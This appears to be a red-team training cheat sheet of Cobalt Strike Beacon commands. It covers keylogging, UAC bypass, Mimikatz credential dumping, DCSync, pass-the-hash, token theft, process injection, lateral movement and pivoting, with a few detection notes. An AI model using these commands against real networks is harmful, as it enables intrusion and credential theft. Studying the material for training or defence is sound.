Beacon Commands
1. Basics:
getuid --> who we are
getprivs --> privileges
net logons --> user sessions
run klist --> see available kerberos tickets
help sleep --> control how often the beacon calls home
- Files
ls <C:\Path> --> List the file on the specified directory
cd [directory] --> Change into the specified working directory
rm [file\folder] --> Delete a file\folder
cp [src] [dest] --> File copy
download [C:\filePath] --> Download a file from the path on the Beacon host
downloads --> Lists downloads in progress
cancel [*file*] --> Cancel a download currently in progress
upload [/path/to/file] --> Upload a file from the attacker to the current Beacon host
- Powershell and .NET
powershell-import [/path/to/script.ps1] --> Import a Powershell .ps1 script from the control server and save it in memory in Beacon
powershell [commandlet][arguments] --> Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned.
powerpick [commandlet] [argument] -->Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto
powerpick $ExecutionContext.SessionState.LanguageMode --> scape from Powershell CLM
psinject [pid][arch] [commandlet] [arguments] --> Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs
execute-assembly {location of the binary in attacker machine} --> Run a local .NET executable as a Beacon post-exploitation job.
If we are running a big tool with execute-assembly, and we receive that the task size is over the max, we could try reducing the tool size, or modify Beacon's task size to make it larger, add set tasks_max_size "2097152"; to the top of the C2 profile.
2. Host Reconnaissance:
- List running processes on a system
ps
- Screenshots:
printscreen Take a single screenshot via PrintScr method
screenshot Take a single screenshot
screenwatch Take periodic screenshots of desktop
To see all the screenshots that have been taken, go to View > Screenshots
- Keylogger
keylogger
All keystrokes can be seen at View > Keystrokes.
The keylogger runs as a job that can be stopped with the jobkill command.
- Clipboard
clipboard
The clipboard command will capture any text from the user's clipboard.
This is a one-off command (it does not run as a job) and dumps the content directly to the Beacon console.
- User Sessions
net logons
2. Privilege Escalation
- User Account Control (UAC) Bypasses:
We can try whoami /groups, if we are Medium Mandatory Level, even if we are admins, when creating a new user, for example, it will display an error and we then need to right click and run as administrator, which will cause a UAC prompt to apear.
Beacon has a few built-in UAC bypasses and a few more which are provided via the Elevate Kit (https://github.com/cobalt-strike/ElevateKit)
elevate uac-schtasks {tcp-local listener}
After that, Command Prompt will have sufficient privileges to make system configuration changes, as it will now be running in "high integrity".
3. Mimikatz
! Mimikatz built into Cobalt Strike by default is not recent enough to work on later versions of Windows so we will need to a Mimikatz Kit (https://github.com/gentilkiwi/mimikatz)
There are some differences with how it behaves in Beacon compared to the console version. Each time you execute Mimikatz in Beacon, it does so in a new temporary process which is then destroyed. This means you can't run two "related" command.
Since CS 4.8, you can chain multiple commands together by separating them with a semi-colon. Example:
beacon> mimikatz token::elevate ; lsadump::sam
Beacon also has its own command convention using the ! and @ symbols as "modifiers".
The ! elevates Beacon to SYSTEM before running the given command, which is useful in cases where you're running in high-integrity but need to impersonate SYSTEM. In most cases, ! is a direct replacement for token::elevate.
The @ impersonates Beacon's thread token before running the given command, which is useful in cases where Mimikatz needs to interact with a remote system, such as with dcsync. This is also compatible with other impersonation primitives such as make_token and steal_token.
In this section we will use the ! and @ modifiers described before and the dedicated commands for some mimikatz modules, helping us improve the results from the normal mimikatz described in Privesc and Post-exploitation/Windows Post-Exploitation/Credential Theft/Mimikatz.
- NTLM Hashes (This command requires elevated privileges)
This module will open a read handle to LSASS which can be logged under event 4656. Use the "Suspicious Handle to LSASS" saved search in Kibana to see them.
mimikatz !sekurlsa::logonpasswords
Cobalt Strike also has a short-hand command for this called logonpasswords. After dumping these credentials, go to View > Credentials to see a copy of them.
- Kerberos Encryption Keys (This command requires elevated privileges)
This module also opens a read handle to LSASS.
mimikatz !sekurlsa::ekeys
- Security Account Manager (This command requires elevated privileges)
This module will open a handle to the SAM registry hive. Use the "Suspicious SAM Hive Handle" saved search in Kibana to see them.
mimikatz !lsadump::sam
- Domain Cached Credentials (This command requires elevated privileges)
This module will open a handle to the SECURITY registry hive. Use the "Suspicious SECURITY Hive Handle" saved search in Kibana to see them.
mimikatz !lsadump::cache
- DCSync (This requires GetNCChanges which is usually only available to domain admins)
Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.
Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set).
Example to extract the NTLM and AES keys for the krbtgt account using lamb (a domain admin):
make_token DEV\nlamb F3rrari
dcsync dev.example.io DEV\krbtgt
- DPAPI (Credential Manager)
To get master key:
First option (local admin access on the machine and if the key is cached in LSASS):
mimikatz !sekurlsa::dpapi
Second option (MS-BKRP, need to be executed in the context of the user who owns the key, if we are running as another user or system, we must use the @ modifier)
mimikatz @dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\{SID: S-X-X-XX-}\{masterkeyGUID} /rpc
Then to decrypt it:
mimikatz dpapi::cred /in:C:\Users\User\AppData\Local\Microsoft\Credentials\{BLOB} /masterkey:{key_obtained}
Then we can impersonate the user (make token).
- DPAPI (Scheduled Task Credentials)
ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\{BLOB}
mimikatz !sekurlsa::dpapi
mimikatz dpapi::cred /in:C:\Users\User\AppData\Local\Microsoft\Credentials\{BLOB} /masterkey:{key_obtained}
Then we can impersonate the user (make token).
4. User Impersonation
- Pass the Hash:
Beacon has a dedicated pth command which executes Mimikatz in the background. Example:
pth DEV\paco 59fc0f884922b4ce376051134c71e22c
To "drop" impersonation afterwards, use the rev2self command.
Two opportunities to detect PTH are the R/W handle to LSASS; and looking for the echo foo > \\.\pipe\bar pattern in command-line logs.
For pass-the-hash, we can simply manually use mimikatz, start an arbitrary process and steal its token.
- Token Impersonation
For pass the ticket attacks or if we elevate or land on a system where a user is running a process, to impersonate it's token:
steal_token {pid}
- Token Store
This is an evolution on the steal_token command which allows you to steal and store tokens for future use:
token-store steal {pid}
To list all the tokens in the store:
token-store show
To impersonate one:
token-store use {id}
The rev2self command will drop the impersonation token, but it will remain in the store so that it can be impersonated again. A token can be removed from the store using token-store remove {id} or the entire store flushed with token-store remove-all.
Each Beacon has its own token store. You cannot transfer tokens from one Beacon to another, even if they're on the same host.
- Make Token
This command allows you to impersonate a user if you know their plaintext password. Example:
make_token DEV\paco Qwerty123
To leverage a ms-Mcs-AdmPwd (LAPS):
make_token .\LapsAdmin {ms-mcs-admpwd}
This technique behaves in the same way as runas /netonly . So it may be difficult to distinguish legitimate and malicious events.
The logon session created with LogonUserA has the same local identifier as the caller but the alternate credentials are used when accessing a remote resource.
This also means that make_token is not applicable to anything you may want to run on the current machine. For that, spawnas may be a better solution.
- Process Injection
Beacon has two main injection commands:
shinject allows you to inject any arbitrary shellcode from a binary file on your attacking machine
inject will inject a full Beacon payload for the specified listener.
inject {pid} {arch} {listener}
Example:
inject 4464 x64 tcp-local
The command will also automatically attempt to connect to the child if a P2P listener is used. The resulting Beacon will run with the full privilege of the user who owns the process.
If the user closes this process, the Beacon will be lost. The shellcode that's injected uses the Exit Thread function, so it won't kill the process if we exit the Beacon.
5. Lateral Movement
jump [method] [target] [listener]
remote-exec [method] [target] [command]
- Windows Remote Management
The winrm and winrm64 methods can be used for 32 and 64-bit targets as appropriate.
The SMB Beacon is an excellent choice when moving laterally, because the SMB protocol is used extensively in a Windows environment, so this traffic blends in very well. Example:
jump winrm64 web.dev.cyberbotic.io smb
- PsExec
The psexec / psexec64 commands work by uploading a service binary to the target system, then creating and starting a Windows service to execute that binary. Beacons executed this way run as SYSTEM. Example:
jump psexec64 web.dev.cyberbotic.io smb
psexec_psh doesn't copy a binary to the target, but instead executes a PowerShell one-liner (always 32-bit). Example:
jump psexec_psh web smb
- Windows Management Instrumentation (WMI)
The most straight forward means of using this is to upload a payload to the target system and use WMI to execute it.
cd \\web.dev.cyberbotic.io\ADMIN$
upload C:\Payloads\smb_x64.exe
remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
The process is now running on the target so now we need to connect to it.
link {target} {pipe name}
link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
Because of CoInitializeSecurity, WMI may fail with access denied, so WMI execution needs to come from a different process. This can be achieved with commands such as spawn and spawnas, or even execute-assembly with a tool such as SharpWMI (Exploitation/Active Directory/Attacks and more/Lateral Movement/In Windows/WMI/SharpWMI).
6. Pivoting
portscan {IP} {port} --> To see if a target has a port open or not
- SOCKS Proxies
Use the socks command on the Beacon that you want to act as the pivot point.
To start a SOCKS4a proxy simply run:
socks 1080
For SOCKS5:
socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
You will then see port 1080 bound on the team server VM.
- Reverse Port Forwards
rportfwd command. Example (Blind port 8080 on the machine we have the beacon tunneling back the traffic to our C2 listener in port 80):
rportfwd 8080 127.0.0.1 80
So If we want to access a file hosted in our team server port 80 from the machine we dont have conecction with, instead of try downloading http://attacker.com/a we will access to http://{ip or name of the machine where we have the beacon and we have applied the port forward}:8080/a.
! Before creating a port forward, add a rule to the windows firewall (Tunneling/Port Forwarding/Chisel Port Forwarding/Windows Firewall).
Last updated